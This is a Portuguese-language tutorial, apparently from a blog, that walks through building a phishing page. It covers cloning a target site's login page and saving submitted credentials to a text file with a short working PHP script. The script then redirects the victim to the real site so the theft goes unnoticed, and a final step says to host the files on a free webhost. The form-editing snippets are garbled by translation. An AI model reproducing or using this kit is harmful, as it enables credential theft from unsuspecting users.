Agora, vamos ver como eles criam essas páginas de phishing em primeiro lugar com o passo-a-passo. O conhecimento de PHP e HTML será muito útil para criar páginas de login falso
1 - Selecione um site de destino e navegue até a página de login.
2 - Salve a página inteira indo em Arquivo>Salvar como...
3 - Você terá agora um arquivo HTML e uma pasta cheia de imagens e talvez alguns arquivos Javascript. Renomeie o arquivo HTML para index.html e crie um outro arquivo chamado lista.txt. Este arquivo de texto irá realizar as credenciais de login das vítimas.
4 - Crie um arquivo PHP com o nome “phish.php“
5 - Cole o seguinte código para o arquivo PHP (phish.php) que você já fez. Este código é o que leva os detalhes de login e os armazena no arquivo “lista.txt“, e depois redireciona para o site real. Desta forma, o usuário vai pensar que ele colocou as informações de login errado e terá êxito, a segunda vez que ele for tentar se logar o site se redirecionara para o site real. Fazendo assim com que a vitima nem perceba que seus dados foram roubados.
<?php
Header("Location: http://www.linkdositeoriginal.com");
$handle = fopen("lista.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
6 - Agora temos que apontar o formulário de login no arquivo HTML para o arquivo PHP (phish.php). Localize o código do formulário no arquivo HTML e alterar o link de ação para o arquivo PHP e do tipo de método de começar assim que as informações apresentadas são passados através da URL. O código HTML deve começar com algo como isto:
<form action = sitelink ” . com o método = “GET”>Altere para:
<form action = http://www.site.com/phish.php ” . com o método = “GET”>Ou:
<form action = phish.php ” . com o método = “GET”>
7 - Quando tudo estiver concluído, faça o upload dos arquivos para um webhost gratuito que suporte PHP.
8- Você acabou de criar uma página de phishing.